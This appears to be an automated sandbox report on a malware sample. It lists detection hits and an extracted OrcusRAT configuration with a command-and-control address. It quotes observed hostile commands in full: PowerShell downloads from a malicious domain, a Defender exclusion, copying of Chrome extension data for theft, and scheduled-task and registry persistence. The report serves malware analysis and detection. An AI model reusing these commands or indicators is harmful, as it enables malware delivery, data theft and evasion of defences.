                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runsteal.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", ProcessId: 6920, ProcessName: powershell.exe
                                  Sigma detected: System File Execution Location Anomaly
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Local\Temp\smartscreen.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\smartscreen.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\smartscreen.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\smartscreen.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\smartscreen.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, ParentImage: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, ParentProcessId: 6884, ParentProcessName: RegAsm.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\smartscreen.exe" , ProcessId: 712, ProcessName: smartscreen.exe
                                  Sigma detected: WScript or CScript Dropper
                                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js", ProcessId: 1224, ProcessName: wscript.exe
                                  Sigma detected: CurrentVersion Autorun Keys Modification
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\smartscreen.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\smartscreen.exe, ProcessId: 712, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmartScreen
                                  Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
                                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -command "Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip'", CommandLine: powershell -command "Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c "C:\Users\user\AppData\Local\Temp\downloaded_script.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6328, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip'", ProcessId: 1924, ProcessName: powershell.exe
                                  Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
                                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, ProcessId: 6884, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o0b3f1db.zik.ps1
                                  Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6920, TargetFilename: C:\Users\user\AppData\Local\Temp\downloaded_script.bat
                                  Sigma detected: Potential Browser Data Stealing
                                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: xcopy /E /I "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Chrome\" , CommandLine: xcopy /E /I "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Chrome\" , CommandLine|base64offset|contains: ), Image: C:\Windows\SysWOW64\xcopy.exe, NewProcessName: C:\Windows\SysWOW64\xcopy.exe, OriginalFileName: C:\Windows\SysWOW64\xcopy.exe, ParentCommandLine: cmd.exe /c "C:\Users\user\AppData\Local\Temp\downloaded_script.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6328, ParentProcessName: cmd.exe, ProcessCommandLine: xcopy /E /I "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Chrome\" , ProcessId: 6556, ProcessName: xcopy.exe
                                  Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
                                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, ParentCommandLine: Dr.com B, ParentImage: C:\Users\user\AppData\Local\Temp\491505\Dr.com, ParentProcessId: 4632, ParentProcessName: Dr.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe, ProcessId: 6884, ProcessName: RegAsm.exe
                                  Sigma detected: PowerShell Download Pattern
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }", CommandLine: powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\download.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6352, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }", ProcessId: 6596, ProcessName: powershell.exe
                                  Sigma detected: PowerShell Web Download
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runsteal.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", ProcessId: 6920, ProcessName: powershell.exe
                                  Sigma detected: Powershell Defender Exclusion
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'", CommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\download.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6352, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'", ProcessId: 1020, ProcessName: powershell.exe
                                  Sigma detected: SCR File Write Event
                                  Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\491505\Dr.com, ProcessId: 4632, TargetFilename: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr
                                  Sigma detected: Suspicious Add Scheduled Task Parent
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: Dr.com B, ParentImage: C:\Users\user\AppData\Local\Temp\491505\Dr.com, ParentProcessId: 4632, ParentProcessName: Dr.com, ProcessCommandLine: schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 3632, ProcessName: schtasks.exe
                                  Sigma detected: Suspicious Copy From or To System Directory
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\DM6vAAgoCw.exe", ParentImage: C:\Users\user\Desktop\DM6vAAgoCw.exe, ParentProcessId: 3420, ParentProcessName: DM6vAAgoCw.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd, ProcessId: 4188, ProcessName: cmd.exe
                                  Sigma detected: Suspicious Schtasks From Env Var Folder
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 616, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "West" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 4052, ProcessName: schtasks.exe
                                  Sigma detected: Suspicious Screensaver Binary File Creation
                                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\491505\Dr.com, ProcessId: 4632, TargetFilename: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr
                                  Sigma detected: Usage Of Web Request Commands And Cmdlets
                                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runsteal.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing", ProcessId: 6920, ProcessName: powershell.exe
                                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js", ProcessId: 1224, ProcessName: wscript.exe
                                  Sigma detected: Non Interactive PowerShell Process Spawned
                                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'", CommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\download.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6352, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'", ProcessId: 1020, ProcessName: powershell.exe

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Sigma detected: Search for Antivirus process
                                  Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4188, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 5368, ProcessName: findstr.exe

                                  Suricata Signatures

                                  No Suricata rule has matched

                                  Joe Sandbox Signatures

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Antivirus detection for URL or domain
                                  Source: https://exodus.lat/ss.batAvira URL Cloud: Label: malware
                                  Source: https://exodus.lat/COMSurrogate.exeAvira URL Cloud: Label: malware
                                  Antivirus detection for dropped file
                                  Source: C:\Users\user\AppData\Local\asm\mi.exeAvira: detection malicious, Label: HEUR/AGEN.1311679
                                  Found malware configuration
                                  Source: 22.2.RegAsm.exe.7c0000.0.unpackMalware Configuration Extractor: OrcusRAT {"AutostartBuilderProperty": {"AutostartMethod": "Disable", "TaskSchedulerTaskName": "Orcus", "TaskHighestPrivileges": "true", "RegistryHiddenStart": "true", "RegistryKeyName": "Orcus", "TryAllAutostartMethodsOnFail": "true"}, "ChangeAssemblyInformationBuilderProperty": {"ChangeAssemblyInformation": "false", "AssemblyTitle": null, "AssemblyDescription": null, "AssemblyCompanyName": null, "AssemblyProductName": null, "AssemblyCopyright": null, "AssemblyTrademarks": null, "AssemblyProductVersion": "1.0.0.0", "AssemblyFileVersion": "1.0.0.0"}, "ChangeCreationDateBuilderProperty": {"IsEnabled": "false", "NewCreationDate": "2024-11-27T14:29:12"}, "ChangeIconBuilderProperty": {"ChangeIcon": "false", "IconPath": null}, "ClientTagBuilderProperty": {"ClientTag": null}, "ConnectionBuilderProperty": {"IpAddresses": [{"Ip": "45.74.38.211", "Port": "4782"}]}, "DataFolderBuilderProperty": {"Path": "%appdata%\\Orcus"}, "DefaultPrivilegesBuilderProperty": {"RequireAdministratorRights": "false"}, "DisableInstallationPromptBuilderProperty": {"IsDisabled": "true"}, "FrameworkVersionBuilderProperty": {"FrameworkVersion": "NET45"}, "HideFileBuilderProperty": {"HideFile": "false"}, "InstallationLocationBuilderProperty": {"Path": "%programfiles%\\Orcus\\Orcus.exe"}, "InstallBuilderProperty": {"Install": "false"}, "KeyloggerBuilderProperty": {"IsEnabled": "false"}, "MutexBuilderProperty": {"Mutex": "7a9c0f279c464958aebbd585f20f1cf2"}, "ProxyBuilderProperty": {"ProxyOption": "None", "ProxyAddress": null, "ProxyPort": "1080", "ProxyType": "2"}, "ReconnectDelayProperty": {"Delay": "10000"}, "RequireAdministratorPrivilegesInstallerBuilderProperty": {"RequireAdministratorPrivileges": "true"}, "RespawnTaskBuilderProperty": {"IsEnabled": "false", "TaskName": "Orcus Respawner"}, "ServiceBuilderProperty": {"Install": "false"}, "SetRunProgramAsAdminFlagBuilderProperty": {"SetFlag": "false"}, "WatchdogBuilderProperty": {"IsEnabled": "false", "Name": "OrcusWatchdog.exe", "WatchdogLocation": "AppData", "PreventFileDeletion": "false"}}
                                  Multi AV Scanner detection for dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeReversingLabs: Detection: 42%
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeReversingLabs: Detection: 70%
                                  Source: C:\Users\user\AppData\Local\asm\mi.exeReversingLabs: Detection: 63%
                                  Multi AV Scanner detection for submitted file
                                  Source: DM6vAAgoCw.exeReversingLabs: Detection: 31%
                                  Source: DM6vAAgoCw.exeVirustotal: Detection: 30%Perma Link
                                  AI detected suspicious sample
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.1% probability
                                  Machine Learning detection for dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\asm\mi.exeJoe Sandbox ML: detected

                                  Bitcoin Miner

                                  barindex
                                  Yara detected Xmrig cryptocurrency miner
                                  Source: Yara matchFile source: 55.2.COMSurrogate.exe.2749fd31a78.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 53.2.COMSurrogate.exe.1f79a831a78.2.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 47.2.COMSurrogate.exe.1ee7638f4b0.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 53.2.COMSurrogate.exe.1f79ae4f4b0.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000035.00000002.4579522041.000001F79AD72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000002.4579522041.000001F79B391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000002.4579522041.000001F79B454000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000002.4579522041.000001F79B4A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000002F.00000002.4579567004.000001EE7636F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000002F.00000002.4566859084.000001EE65D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000037.00000002.4582934656.000002749FD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\asm\mi.exe, type: DROPPED
                                  Source: DM6vAAgoCw.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: DM6vAAgoCw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Source: Binary string: q$costura.orcus.staticcommands.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: costura.shelllibrary.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: D:\Dokumente\GitHub\starksoft-aspen\Starksoft.Aspen\obj\Release\starksoft.aspen.pdb source: RegAsm.exe, 00000016.00000002.4642907007.00000000061D0000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.Shared\obj\Release\Orcus.Shared.pdb@q source: RegAsm.exe, 00000016.00000002.4626770103.0000000005130000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: D:\Dokumente\GitHub\starksoft-aspen\Starksoft.Aspen\obj\Release\starksoft.aspen.pdbL source: RegAsm.exe, 00000016.00000002.4642907007.00000000061D0000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: costura.costura.pdb.compressed source: smartscreen.exe, 00000032.00000002.4565651226.0000021642F31000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000016.00000000.3684956628.00000000003E2000.00000002.00000001.01000000.0000000A.sdmp
                                  Source: Binary string: costura.directoryinfoex.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: D:\Tools\CLIPPER\obj\Release\net461\win-x64\CLIPPER.pdbSHA256 source: RegAsm.exe, 00000016.00000002.4571175471.0000000003217000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.Plugins\obj\Release\Orcus.Plugins.pdb source: RegAsm.exe, 00000016.00000002.4570721077.0000000002A50000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: q&costura.orcus.shared.utilities.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000016.00000000.3684956628.00000000003E2000.00000002.00000001.01000000.0000000A.sdmp
                                  Source: Binary string: costura.orcus.shared.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.StaticCommands\obj\Release\Orcus.StaticCommands.pdb source: RegAsm.exe, 00000016.00000002.4641407014.0000000005A90000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: C:\Users\zack3r\Desktop\Orcus.Plugins.ADE\Orcus.Plugins.BsodProtection-master\Source\obj\Debug\BsodProtection.pdb source: RegAsm.exe, 00000016.00000002.4641342536.0000000005A80000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: costura.opuswrapper.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.StaticCommands\obj\Release\Orcus.StaticCommands.pdbH0 source: RegAsm.exe, 00000016.00000002.4641407014.0000000005A90000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: D:\Tools\CLIPPER\obj\Release\net461\win-x64\CLIPPER.pdb source: RegAsm.exe, 00000016.00000002.4571175471.0000000003217000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: q'costura.fluentcommandlineparser.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.Shared.Utilities\obj\Release\Orcus.Shared.Utilities.pdb source: RegAsm.exe, 00000016.00000002.4640471488.0000000005A40000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: D:\Users\User\Downloads\Orcus-1.9.1\Orcus.Shared\obj\Release\Orcus.Shared.pdb source: RegAsm.exe, 00000016.00000002.4626770103.0000000005130000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: C:\Users\zack3r\Desktop\Orcus.Plugins.ADE\Orcus.Plugins.BsodProtection-master\Source\obj\Debug\BsodProtection.pdb8*R* D*_CorDllMainmscoree.dll source: RegAsm.exe, 00000016.00000002.4641342536.0000000005A80000.00000004.08000000.00040000.00000000.sdmp
                                  Source: Binary string: costura.orcus.plugins.pdb.zip source: RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00694005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00694005
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0069C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_0069C2FF
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0069494A GetFileAttributesW,FindFirstFileW,FindClose,18_2_0069494A
